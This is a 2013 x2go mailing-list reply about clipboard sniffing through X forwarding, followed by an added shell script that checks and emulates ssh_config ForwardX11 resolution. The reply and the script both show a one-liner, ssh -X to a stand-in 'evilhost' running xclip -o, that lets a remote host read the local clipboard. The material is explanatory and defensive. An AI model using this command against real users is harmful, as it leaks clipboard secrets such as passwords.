Subject: Bug#258: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
From: Alexander Wuerstlein
To: Christoph Anton Mitterer, 258@bugs.x2go.org
Reply-To: Alexander Wuerstlein, 258@bugs.x2go.org
Resent-To: x2go-dev@lists.berlios.de
Date: Mon, 1 Jul 2013 13:43:56 +0200
Message-ID: <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
In-Reply-To: <1372646308.18508.2.camel@heisenberg.scientia.net>
X-X2Go-PR-Message: followup 258
X-X2Go-PR-Package: x2goclient
X-X2Go-PR-Keywords: security
User-Agent: Mutt/1.5.21 (2010-09-15)

On 13-07-01 04:56, Christoph Anton Mitterer wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
>
> Hi.
>
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
>
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmits the content of
> the clipboard to the remote host.

Yes, other related tools like X11. x2go is basically just a faster version
of the traditional X forwarding. In X11 every client can always access the
clipboard/selection/etc., so you will also have the same security problems
(by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this.

> As this may easily contain passwords or other sensitive information,
> this is an extremely critical hole.

I disagree, this is not a hole at all; it works as intended. It's just that
users are often not educated about the implications of passing around
passwords via the clipboard etc. But I concur that the ability to switch
off clipboard/selection/... forwarding in the x2goagent/x2goclient would be
nice to have. Patches are of course always welcome.

Ciao,

Alexander Wuerstlein.
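The 'ssh -X user@evilhost "xclip -o"' demonstration above, as an added example that is not part of the bug report or of x2go's code: the attack one-liner as a function, the authoritative `ssh -G` check for what your client would actually do for a host, and an offline emulation of ssh_config(5) lookup (first obtained value wins, Host patterns are shell globs, "!" negates a pattern) so the resolution can be run against a constructed config without an X display or a remote host. The host names, the sample config and the use of mktemp are assumptions made for illustration; the emulation only understands the "Keyword value" spelling and skips Match blocks.

```shell
#!/bin/sh
# Added example, not x2go or OpenSSH code. Host names and the sample
# ~/.ssh/config below are constructed for illustration.

# The attack as described in the message: with -X (or -Y) every X client the
# remote side starts, xclip included, can read the local selections.
# Needs a real display and SSH access to the host; it is defined, not run.
remote_reads_local_selection() {
    host="$1"
    ssh -X "$host" 'for s in primary clipboard; do printf "%s: " "$s"; xclip -o -selection "$s"; echo; done'
}

# Authoritative check for a real host: what ssh itself resolves ForwardX11 to
# (OpenSSH -G, available since 6.8). Not run here either.
effective_forwardx11() {
    ssh -G "$1" | awk 'tolower($1) == "forwardx11" { print tolower($2) }'
}

# Offline emulation of ssh_config(5) resolution for one keyword.
# Assumptions: "Keyword value" spelling only (no "Keyword=value"), comments
# only on their own line, Match blocks treated as never matching.
config_value() (
    set -f                                  # Host patterns must not glob the cwd
    file="$1"; host="$2"; default="$4"
    want="$(printf '%s' "$3" | tr 'A-Z' 'a-z')"
    active=1; result=""                     # options before any Host line apply to all
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in '#'*|'') continue ;; esac
        set -- $line
        kw="$(printf '%s' "$1" | tr 'A-Z' 'a-z')"
        case "$kw" in
            host)
                shift; active=0; negated=0
                for pat in "$@"; do
                    case "$pat" in
                        '!'*) case "$host" in ${pat#!}) negated=1 ;; esac ;;
                        *)    case "$host" in $pat)     active=1  ;; esac ;;
                    esac
                done
                [ "$negated" -eq 0 ] || active=0 ;;
            match) active=0 ;;
            *)
                # first obtained value wins, exactly as ssh does it
                if [ "$active" -eq 1 ] && [ -z "$result" ] && [ "$kw" = "$want" ]; then
                    result="$(printf '%s' "$2" | tr 'A-Z' 'a-z')"
                fi ;;
        esac
    done < "$file"
    printf '%s\n' "${result:-$default}"
)

# yes/no: would this host be handed the display (and with it the selections)?
# ssh's own default for ForwardX11 is "no"; -X/-Y on the command line override the file.
x11_forwarding_enabled() {
    case "$(config_value "$1" "$2" ForwardX11 no)" in
        yes|true) echo yes ;;
        *)        echo no ;;
    esac
}

# Constructed sample ~/.ssh/config (not from the report).
sample_config() {
    cat <<'EOF'
# evilhost gets the display, so "xclip -o" there reads the local clipboard
Host evilhost
    ForwardX11 yes
# corp hosts are off, except the bastion, which falls through to "Host *"
Host !bastion.corp.example *.corp.example
    ForwardX11 no
# overly broad default
Host *
    ForwardX11 yes
EOF
}

cfg="$(mktemp)"; sample_config > "$cfg"
for h in evilhost db.corp.example bastion.corp.example other.example; do
    printf '%-22s ForwardX11=%s\n' "$h" "$(x11_forwarding_enabled "$cfg" "$h")"
done
rm -f "$cfg"
```

Note that `ForwardX11 no` in the file is no protection if you habitually type `ssh -X`; the command-line flag wins, and `ssh -x` (lowercase) is the flag that turns forwarding off for one connection. For x2go itself the message says there is no equivalent switch yet, which is the feature request here.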